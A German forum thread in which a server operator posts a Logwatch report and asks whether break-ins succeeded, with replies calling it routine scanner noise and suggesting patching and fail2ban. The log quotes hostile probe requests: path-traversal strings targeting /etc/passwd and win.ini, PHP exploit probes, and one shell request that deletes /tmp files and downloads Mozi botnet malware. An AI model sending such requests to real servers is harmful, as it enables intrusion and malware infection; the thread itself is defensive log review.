Die Logwatchanalyse meines Servers. Seht ihr hier erfolgreiche Einbruchversuche? ################### Logwatch 7.4.3 (12/07/16) #################### Processing Initiated: Tue Jan 28 04:27:15 2020 Date Range Processed: yesterday ( 2020-Jan-27 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: domain.com ################################################################## --------------------- Dovecot Begin ------------------------ Dovecot IMAP and POP3 Successful Logins: 81 Dovecot disconnects: 100 Total **Unmatched Entries** dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1053, sent=12893: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1101, sent=13089: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1233, sent=13570: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1253, sent=6024: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1257, sent=13692: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1266, sent=6064: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1266, sent=6080: 2 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1266, sent=6082: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1279, sent=6128: 2 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1279, sent=6138: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1293, sent=13821: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1638, sent=15790: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1651, sent=15814: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1664, sent=15886: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1677, sent=15956: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1689, sent=8321: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1703, sent=15998: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1729, sent=16156: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1767, sent=8609: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1780, sent=8685: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1794, sent=16342: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1820, sent=16462: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1859, sent=16628: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1885, sent=16670: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1897, sent=9105: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1911, sent=16798: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1949, sent=9317: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=1988, sent=9425: 2 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=199, sent=8141: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2002, sent=17110: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2014, sent=9557: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2041, sent=17278: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2080, sent=17444: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2093, sent=17492: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2113, sent=22203: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2132, sent=17614: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2145, sent=21894: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2171, sent=17758: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2221, sent=21732: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2241, sent=22255: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2245, sent=22075: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2254, sent=22312: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2309, sent=52285: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2322, sent=22370: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=235, sent=8274: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=235, sent=8282: 3 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2369, sent=22763: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2369, sent=23023: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2369, sent=52739: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2401, sent=22910: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2433, sent=23022: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2434, sent=53437: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2446, sent=23065: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=253, sent=9101: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2533, sent=53120: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2566, sent=70973: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2616, sent=25579: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2618, sent=52960: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=266, sent=9089: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=2860, sent=41487: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=3012, sent=54370: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=3333, sent=144816: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=374, sent=9520: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=517, sent=10195: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=566, sent=10280: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=580, sent=2712: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=602, sent=10421: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=604, sent=2806: 5 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=849, sent=12066: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=854, sent=11408: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=921, sent=12368: 1 Time(s) dovecot: service=imap, user=neu@domain.com, ip=[52.125.141.35]. Logged out rcvd=933, sent=12431: 1 Time(s) dovecot: service=lda, user=neu@domain.com, ip=[]. msgid=<1190434253.817170.1580146479563.JavaMail.ebayk@kcron47-1.mobile.r z>: saved mail to INBOX: 1 Time(s) dovecot: service=lda, user=neu@domain.com, ip=[]. msgid=<20200127032747.E184923C9A@domain.com>: saved mail to INBOX: 1 Time(s) dovecot: service=lda, user=neu@domain.com, ip=[]. msgid=<20200127190117.299A22B909@domain.com>: saved mail to INBOX: 1 Time(s) dovecot: service=lda, user=neu@domain.com, ip=[]. msgid=<589951437.805719.1580146445828.JavaMail.ebayk@kcron47-1.mobile.rz >: saved mail to INBOX: 1 Time(s) dovecot: service=lda, user=neu@domain.com, ip=[]. msgid=? <MN2PR20MB2590CCDFEE36F585F2599A54B90B0@MN2PR20MB2590.namprd20.prod.outl ook.com>: saved mail to INBOX: 1 Time(s) ---------------------- Dovecot End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 222.186.19.221 -> ip.ws.126.net:443: 1 Time(s) A total of 14 sites probed the server 107.77.208.131 174.246.134.40 185.156.177.234 185.210.219.156 188.25.92.121 203.59.158.219 214.3.138.230 216.10.217.24 70.93.216.133 73.42.134.193 75.35.113.245 80.255.10.194 83.175.83.91 95.9.158.68 Requests with error response codes 400 Bad Request /: 8 Time(s) %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e ... winnt%5cwin.ini: 2 Time(s) ../../../../../../../../../../../../windows/win.ini: 2 Time(s) ../../../../../../../../../../../../winnt/win.ini: 2 Time(s) ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini: 2 Time(s) ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini: 2 Time(s) .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/windows/win.ini: 2 Time(s) .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini: 2 Time(s) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e ... e%2e/etc/passwd: 2 Time(s) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e ... e/winnt/win.ini: 2 Time(s) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e ... windows/win.ini: 2 Time(s) /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%u ... e/winnt/win.ini: 2 Time(s) /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%u ... ff0e/etc/passwd: 2 Time(s) /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%u ... windows/win.ini: 2 Time(s) /../../../../../../../../../../../../etc/passwd: 2 Time(s) /../../../../../../../../../../../../windows/win.ini: 2 Time(s) /../../../../../../../../../../../../winnt/win.ini: 2 Time(s) /./../../../../../../../../../../../etc/passwd: 2 Time(s) /././././././../../../../../etc/passwd: 2 Time(s) /././././././../../../../../windows/win.ini: 2 Time(s) /././././././../../../../../winnt/win.ini: 2 Time(s) //../../../../../../../../../../../../etc/passwd: 2 Time(s) null: 1 Time(s) 404 Not Found /robots.txt: 51 Time(s) /modules/base/js/owa.tracker-combined-min.js: 10 Time(s) /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2 ... 2e%2fetc/passwd: 2 Time(s) /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2 ... ndows%5cwin.ini: 2 Time(s) /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\% ... \winnt\\win.ini: 2 Time(s) /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\% ... indows\\win.ini: 2 Time(s) /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..% ... ndows%2fwin.ini: 2 Time(s) /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..% ... winnt%2fwin.ini: 2 Time(s) /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..% ... ndows%5cwin.ini: 2 Time(s) /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..% ... nnt%5cwin%2eini: 2 Time(s) /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..% ... ows%5cwin%2eini: 2 Time(s) /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..% ... winnt%5cwin.ini: 2 Time(s) /%80../%80../%80../%80../%80../%80../windows/win.ini: 2 Time(s) /%80../%80../%80../%80../%80../%80../winnt/win.ini: 2 Time(s) /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c ... e/winnt/win.ini: 2 Time(s) /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c ... windows/win.ini: 2 Time(s) /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.% ... windows/win.ini: 2 Time(s) /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./winnt/win.ini: 2 Time(s) /.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f.. ... ..%2fetc/passwd: 2 Time(s) /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f. ... ..%2fetc/passwd: 2 Time(s) /..../..../..../..../..../..../..../..../. ... ..../etc/passwd: 2 Time(s) /..../..../..../..../..../..../..../..../. ... windows/win.ini: 2 Time(s) /..../..../..../..../..../..../..../..../..../winnt/win.ini: 2 Time(s) /....\\....\\....\\....\\....\\....\\....\ ... \winnt\\win.ini: 2 Time(s) /....\\....\\....\\....\\....\\....\\....\ ... indows\\win.ini: 2 Time(s) /.../.../.../.../.../.../.../.../.../windows/win.ini: 2 Time(s) /.../.../.../.../.../.../.../.../.../winnt/win.ini: 2 Time(s) /...\\...\\...\\...\\...\\...\\...\\...\\. ... indows\\win.ini: 2 Time(s) /...\\...\\...\\...\\...\\...\\...\\...\\...\\winnt\\win.ini: 2 Time(s) /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini: 2 Time(s) /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini: 2 Time(s) /.cobalt: 2 Time(s) /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini: 2 Time(s) /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini: 2 Time(s) /Adminbaecd655/Login.php: 2 Time(s) /DizDrwsQtDzJ.asp: 2 Time(s) /DizDrwsQtDzJ.cfm: 2 Time(s) /DizDrwsQtDzJ.cgi: 2 Time(s) /DizDrwsQtDzJ.html: 2 Time(s) /DizDrwsQtDzJ.inc: 2 Time(s) /DizDrwsQtDzJ.php: 2 Time(s) /DizDrwsQtDzJ.php3: 2 Time(s) /DizDrwsQtDzJ.pl: 2 Time(s) /DizDrwsQtDzJ.sh: 2 Time(s) /DizDrwsQtDzJ.shtml: 2 Time(s) /Home.do: 2 Time(s) /MSWSMTP/Common/Authentication/Logon.aspx: 2 Time(s) /admin.back: 2 Time(s) /ads.txt: 2 Time(s) /cgi-bin/DizDrwsQtDzJ.asp: 2 Time(s) /cgi-bin/DizDrwsQtDzJ.cfm: 2 Time(s) /cgi-bin/DizDrwsQtDzJ.cgi: 2 Time(s) /cgi-bin/DizDrwsQtDzJ.html: 2 Time(s) /cgi-bin/DizDrwsQtDzJ.inc: 2 Time(s) /cgi-bin/DizDrwsQtDzJ.php: 2 Time(s) /cgi-bin/DizDrwsQtDzJ.php3: 2 Time(s) /cgi-bin/DizDrwsQtDzJ.pl: 2 Time(s) /cgi-bin/DizDrwsQtDzJ.sh: 2 Time(s) /cgi-bin/DizDrwsQtDzJ.shtml: 2 Time(s) /commoncgi/servlet/CCGIServlet?ApHost=PDT_ ... File=logout.htm: 2 Time(s) /file: 2 Time(s) /header.php?tab=status: 2 Time(s) /index.php?s=/Index/\\think\\app/invokefun ... ]=HelloThinkPHP: 2 Time(s) /intruvert/jsp/admin/Login.jsp: 2 Time(s) /login.html: 2 Time(s) /nessus\\..\\..\\..\\..\\..\\..\\windows\\win.ini: 2 Time(s) /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini: 2 Time(s) /properties/configuration.php?tab=Status: 2 Time(s) /properties/description.dhtml: 2 Time(s) /scripts/DizDrwsQtDzJ.asp: 2 Time(s) /scripts/DizDrwsQtDzJ.cfm: 2 Time(s) /scripts/DizDrwsQtDzJ.cgi: 2 Time(s) /scripts/DizDrwsQtDzJ.html: 2 Time(s) /scripts/DizDrwsQtDzJ.inc: 2 Time(s) /scripts/DizDrwsQtDzJ.php: 2 Time(s) /scripts/DizDrwsQtDzJ.php3: 2 Time(s) /scripts/DizDrwsQtDzJ.pl: 2 Time(s) /scripts/DizDrwsQtDzJ.sh: 2 Time(s) /scripts/DizDrwsQtDzJ.shtml: 2 Time(s) /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2 ... e/winnt/win.ini: 2 Time(s) /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2 ... windows/win.ini: 2 Time(s) /scripts/fake.cgi?arg=/dir/%2e%2e/%2e%2e/% ... e%2e/etc/passwd: 2 Time(s) /scripts/fake.cgi?arg=/dir/../../../../../ ... ./winnt/win.ini: 2 Time(s) /scripts/fake.cgi?arg=/dir/../../../../../ ... windows/win.ini: 2 Time(s) /scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd: 2 Time(s) /sitemap.xml: 2 Time(s) /solr/admin/info/system?wt=json: 2 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s) /wavemaster.internal: 2 Time(s) /xmldata?item=All: 2 Time(s) /.well-known/assetlinks.json: 1 Time(s) //MyAdmin/scripts/setup.php: 1 Time(s) //myadmin/scripts/setup.php: 1 Time(s) //phpMyAdmin/scripts/setup.php: 1 Time(s) //phpmyadmin/scripts/setup.php: 1 Time(s) //pma/scripts/setup.php: 1 Time(s) /ControlManager/default.htm: 1 Time(s) /muieblackcat: 1 Time(s) /search/tsc.php?200=MzMwMTU0NjA4&21=NjYuMj ... 5bc36c22f3&cv=1: 1 Time(s) /shell?cd+/tmp;rm+-rf+*;wget+http://42.235 ... tmp/Mozi.a+jaws: 1 Time(s) /sonne: 1 Time(s) 405 Method Not Allowed ip.ws.126.net:443: 1 Time(s) 408 Request Timeout null: 13 Time(s) /HNAP1/: 1 Time(s) 501 Not Implemented /: 2 Time(s) ---------------------- httpd End ------------------------- --------------------- HTTPD Errors Begin ------------------------ Level error : 59 Time(s) ---------------------- HTTPD Errors End ------------------------- --------------------- Postfix Begin ------------------------ 22801 SASL authentication failed 22,801 2415 Miscellaneous warnings 2,415 2.549M Bytes accepted 2,673,292 477.042K Bytes sent via SMTP 488,491 180.229K Bytes delivered 184,555 ======== ================================================== 521 Accepted 98.67% 7 Rejected 1.33% -------- -------------------------------------------------- 528 Total 100.00% ======== ================================================== 7 5xx Reject relay denied 100.00% -------- -------------------------------------------------- 7 Total 5xx Rejects 100.00% ======== ================================================== 23546 Connections 23,546 705 Connections lost (inbound) 705 34 Connections lost (outbound) 34 23545 Disconnections 23,545 1020 Removed from queue 1,020 5 Delivered 5 90 Sent via SMTP 90 340 Deferred 340 5983 Deferrals 5,983 537 Bounced (local) 537 349 Bounced (remote) 349 39 Expired and returned to sender 39 514 Notifications sent 514 7056 Connection failures (outbound) 7,056 6 Timeouts (inbound) 6 5 DNS lookup errors 5 182 Hostname verification errors (FCRDNS) 182 9 SMTP protocol violations 9 12 PIX workaround enabled 12 ---------------------- Postfix End ------------------------- --------------------- Connections (secure-log) Begin ------------------------ **Unmatched Entries** wordpress(www.domain.com): Authentication failure for uname from 18.219.157.95: 1 Time(s) wordpress(www.domain.com): Authentication failure for uname from 5.188.62.147: 2 Time(s) ---------------------- Connections (secure-log) End ------------------------- ---------------- ------------------------- ###################### Logwatch End #########################
Sieht für mich aus wie normales Grundrauschen, normale Script-Angriffe. In diesen Logs würdest Du erfolgreiche Angriffe gar nicht sehen, weil nur die abgefangenen aufgelistet werden. Der Schutz besteht darin, die angegriffene Software gepatcht zu haben (z.B. phpMyAdmin) oder die Ordner auf dem Server so zu wählen, daß derartige Scanner sie gar nicht erst findet. /phpmyadmin oder /admin/phpmyadmin dürfte sehr gerne angegriffen werden, /kackakacka/phpmyadmin wird so schnell kein Scanner suchen. Am schönsten bei sowas finde ich eine lange Liste mit Zielen im Access Log, komplett mit 404-Fehlern. Nichts gefunden, Scriptkiddies müssen leider draußen bleiben ooooch...
:
Bearbeitet durch User
Pete schrieb: > Die Logwatchanalyse meines Servers. Seht ihr hier erfolgreiche > Einbruchversuche? Versuche gibt es permanent, auch auf IPv4 Adressen, die noch nie genutzt wurden. Aber so lange es durchweg auf HTTP 400 bzw. authentication failure rausläuft, bleibt es beim Versuch.
häng doch einen fail2ban dran und füttere ihn mit den entsprechenen logfiles (und evtl. benutzerdefinierten filtern). dann werden geblockte ip adressen eine weile gar nicht mehr verbunden.
Pete schrieb: > Die Logwatchanalyse meines Servers. Seht ihr hier erfolgreiche > Einbruchversuche? Wenn du diese Zeilen nicht verstehst, solltest du vielleicht keinen öffentlichen betreiben.
Bitte melde dich an um einen Beitrag zu schreiben. Anmeldung ist kostenlos und dauert nur eine Minute.
Bestehender Account
Schon ein Account bei Google/GoogleMail? Keine Anmeldung erforderlich!
Mit Google-Account einloggen
Mit Google-Account einloggen
Noch kein Account? Hier anmelden.